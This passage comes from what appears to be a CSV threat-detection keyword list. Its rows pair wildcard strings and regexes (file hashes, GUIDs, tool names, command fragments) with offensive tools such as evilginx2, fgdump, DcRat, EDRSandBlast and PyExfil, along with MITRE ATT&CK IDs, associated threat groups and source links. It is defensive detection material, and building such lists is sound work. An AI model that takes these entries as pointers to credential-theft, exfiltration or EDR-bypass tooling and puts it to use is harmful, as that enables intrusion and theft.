Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44824" "*FFA0FDDE-BE70-49E4-97DE-753304EF1113*",".{0,1000}FFA0FDDE\-BE70\-49E4\-97DE\-753304EF1113.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","#GUIDproject","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","44830" "*FFA0FDDE-BE70-49E4-97DE-753304EF1113*",".{0,1000}FFA0FDDE\-BE70\-49E4\-97DE\-753304EF1113.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","#GUIDproject","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","44831" "*ffa5514b45c48061e412487d4defdeffa87a338213aa1bc4aabb3259ce18d7aa*",".{0,1000}ffa5514b45c48061e412487d4defdeffa87a338213aa1bc4aabb3259ce18d7aa.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black 
Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","44832" "*ffa560f9e335f64e3e5716bcf9566e2b80a9071e92f7c2da81a191026d2c3794*",".{0,1000}ffa560f9e335f64e3e5716bcf9566e2b80a9071e92f7c2da81a191026d2c3794.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","44833" "*ffa8bb5d802f08a81815496d7991d3c3be3fd3fe15160bc85dca4cfc1bed7a03*",".{0,1000}ffa8bb5d802f08a81815496d7991d3c3be3fd3fe15160bc85dca4cfc1bed7a03.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44834" "*ffa977849b2f8509e10dc873414ea6eba69531b901f932c8583478d215de863d*",".{0,1000}ffa977849b2f8509e10dc873414ea6eba69531b901f932c8583478d215de863d.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","44836" "*ffb3ecd39698fe5e2fc33483b159f10d1ba16801682aab754f61ccb814eff5d7*",".{0,1000}ffb3ecd39698fe5e2fc33483b159f10d1ba16801682aab754f61ccb814eff5d7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44840" "*ffb4cbd5e7c7b0b110ea1c96ab0d961f40ebdf5adaccdf87bbd34bf75420ff1a*",".{0,1000}ffb4cbd5e7c7b0b110ea1c96ab0d961f40ebdf5adaccdf87bbd34bf75420ff1a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44841" "*ffbdae1e47e2a86fb9791a70eb4e0840b15939f89ef7ba4bd80b6f8bf46a863e*",".{0,1000}ffbdae1e47e2a86fb9791a70eb4e0840b15939f89ef7ba4bd80b6f8bf46a863e.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","44843" "*FFC64B8DA962F05C780B803F11727D9960C31E133523FE9DADA309F8836DD098*",".{0,1000}FFC64B8DA962F05C780B803F11727D9960C31E133523FE9DADA309F8836DD098.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - 
T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","44846" "*ffcce186e5ba227e45785a92225b8455b29da5b85d0b030c0346923625d495dd*",".{0,1000}ffcce186e5ba227e45785a92225b8455b29da5b85d0b030c0346923625d495dd.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","44847" "*ffcd092a7d9ec7d79a115e3e98f4509bee3e3977e401967140e2e5de061f8a0b*",".{0,1000}ffcd092a7d9ec7d79a115e3e98f4509bee3e3977e401967140e2e5de061f8a0b.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","https://www.virustotal.com/gui/file/ffcd092a7d9ec7d79a115e3e98f4509bee3e3977e401967140e2e5de061f8a0b","10","10","N/A","N/A","N/A","N/A","44848" "*ffdfgdfg/nps:latest*",".{0,1000}ffdfgdfg\/nps\:latest.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","1","N/A","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44849" 
"*ffe12c22c2fca0229ce7fd8e7a5953a3df57b32a1c152ad5a104aacbba874a00*",".{0,1000}ffe12c22c2fca0229ce7fd8e7a5953a3df57b32a1c152ad5a104aacbba874a00.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","44850" "*ffe1396fa56e5f86812443498cd6c8abfca613099df1261d08f06a73b14be042*",".{0,1000}ffe1396fa56e5f86812443498cd6c8abfca613099df1261d08f06a73b14be042.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","44851" "*ffe25c6a7a14c2f734af099af620d92bb87e0e6f6eb2f2d035c053232f7173a5*",".{0,1000}ffe25c6a7a14c2f734af099af620d92bb87e0e6f6eb2f2d035c053232f7173a5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44852" "*FFE5AD77-8AF4-4A3F-8CE7-6BDC45565F07*",".{0,1000}FFE5AD77\-8AF4\-4A3F\-8CE7\-6BDC45565F07.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","#GUIDproject","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","44853" 
"*ffe9b626de7112df222bc99cbdecd1f321533dc08e32d2e19cea9642bbb0c4f7*",".{0,1000}ffe9b626de7112df222bc99cbdecd1f321533dc08e32d2e19cea9642bbb0c4f7.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","44854" "*ffebf73d11403dc0bb57ab23a775a568ff5c67c1bb5f8fac7a1f2fbd3960b619*",".{0,1000}ffebf73d11403dc0bb57ab23a775a568ff5c67c1bb5f8fac7a1f2fbd3960b619.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44855" "*fff1c91cf41743e46dc2b43b256680ce9015d0a705b31cf19c2cfb48f48c616f*",".{0,1000}fff1c91cf41743e46dc2b43b256680ce9015d0a705b31cf19c2cfb48f48c616f.{0,1000}","offensive_tool_keyword","Cable","*.NET post-exploitation toolkit for Active Directory reconnaissance and exploitation*","T1087 - T1016 - T1059 - T1482 - T1078","TA0007 - TA0002 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/logangoins/Cable","1","0","#filehash","N/A","7","4","361","40","2025-04-09T01:12:47Z","2024-08-10T19:47:08Z","44856" 
"*fff54c4b8a879869c50760512e87a39578fea5e07ecead1086af4b50561b5453*",".{0,1000}fff54c4b8a879869c50760512e87a39578fea5e07ecead1086af4b50561b5453.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44858" "*fffaec6a59c6d0b368fd980414500ffeb17f3155ec3353f679dfc6caf392ce84*",".{0,1000}fffaec6a59c6d0b368fd980414500ffeb17f3155ec3353f679dfc6caf392ce84.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44860" "*ffnbelfdoeiohenkjibnmadjiehjhajb*",".{0,1000}ffnbelfdoeiohenkjibnmadjiehjhajb.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","44863" "*ffuf *-input-cmd*",".{0,1000}ffuf\s.{0,1000}\-input\-cmd.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","44864" "*ffuf *-u http*",".{0,1000}ffuf\s.{0,1000}\-u\shttp.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","44865" "*ffuf -c *",".{0,1000}ffuf\s\-c\s.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","44866" "*ffuf -fs 185 -c -w 
*",".{0,1000}ffuf\s\-fs\s185\s\-c\s\-w\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","44867" "*ffuf -w *",".{0,1000}ffuf\s\-w\s.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","44868" "*ffuf.exe*",".{0,1000}ffuf\.exe.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","44869" "*ffuf/ffuf*",".{0,1000}ffuf\/ffuf.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","44870" "*ffuf_*_freebsd_*.tar.gz*",".{0,1000}ffuf_.{0,1000}_freebsd_.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","44871" "*ffuf_*_linux_*.tar.gz*",".{0,1000}ffuf_.{0,1000}_linux_.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - 
TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","44872" "*ffuf_*_macOS_*.tar.gz*",".{0,1000}ffuf_.{0,1000}_macOS_.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","44873" "*ffuf_*_openbsd_*.tar.gz*",".{0,1000}ffuf_.{0,1000}_openbsd_.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","44874" "*ffuf_*_windows_*.zip*",".{0,1000}ffuf_.{0,1000}_windows_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","44875" "*ffuf-master.zip*",".{0,1000}ffuf\-master\.zip.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","44876" "*fgdump.exe*",".{0,1000}fgdump\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","44878" 
"*fgexec -c *",".{0,1000}fgexec\s\-c\s.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","N/A","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","44879" "*fgexec.exe*",".{0,1000}fgexec\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","44880" "*fhbohimaelbohpjbbldcngcnapndodjp*",".{0,1000}fhbohimaelbohpjbbldcngcnapndodjp.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","44881" "*fhilaheimglignddkjgofkcbgekhenbh*",".{0,1000}fhilaheimglignddkjgofkcbgekhenbh.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","44882" "*fiddyschmitt/File-Tunnel*",".{0,1000}fiddyschmitt\/File\-Tunnel.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - 
T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","1","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","44884" "*fierce --domain* --dns-servers *",".{0,1000}fierce\s\-\-domain.{0,1000}\s\-\-dns\-servers\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","44885" "*FiercePhish*",".{0,1000}FiercePhish.{0,1000}","offensive_tool_keyword","FiercePhish","FiercePhish is a full-fledged phishing framework to manage all phishing engagements. It allows you to track separate phishing campaigns. schedule sending of emails. and much more. The features will continue to be expanded and will include website spoofing. click tracking. and extensive notification options. ","T1566 - T1566.001 - T1566.002 - T1566.003","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Phishing","https://github.com/Raikia/FiercePhish","1","1","N/A","N/A","N/A","10","1351","255","2024-01-09T02:59:26Z","2016-12-31T19:41:24Z","44886" "*Fiesta Exploit Kit*",".{0,1000}Fiesta\sExploit\sKit.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","44887" "*-file *.bin -instanceid 1337 - source persistence*",".{0,1000}\-file\s.{0,1000}\.bin\s\-instanceid\s1337\s\-\ssource\spersistence.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - 
TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","0","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","44888" "*--file dnschef.ini *",".{0,1000}\-\-file\sdnschef\.ini\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","44889" "*File Generated Successfully.Run Defeat-Defender.bat on target machine*",".{0,1000}File\sGenerated\sSuccessfully\.Run\sDefeat\-Defender\.bat\son\starget\smachine.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","44890" "*File specifed to backdoor does not exist: *",".{0,1000}File\sspecifed\sto\sbackdoor\sdoes\snot\sexist\:\s.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","0","N/A","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","44893" 
"*file_parsers/group_policy_preferences.py*",".{0,1000}file_parsers\/group_policy_preferences\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","44894" "*File_Smuggler_Http_Handler*",".{0,1000}File_Smuggler_Http_Handler.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","44896" "*FILE_TO_EXFIL = ""*",".{0,1000}FILE_TO_EXFIL\s\=\s\"".{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","44897" "*FileControler/FileControler_x64.dll*",".{0,1000}FileControler\/FileControler_x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
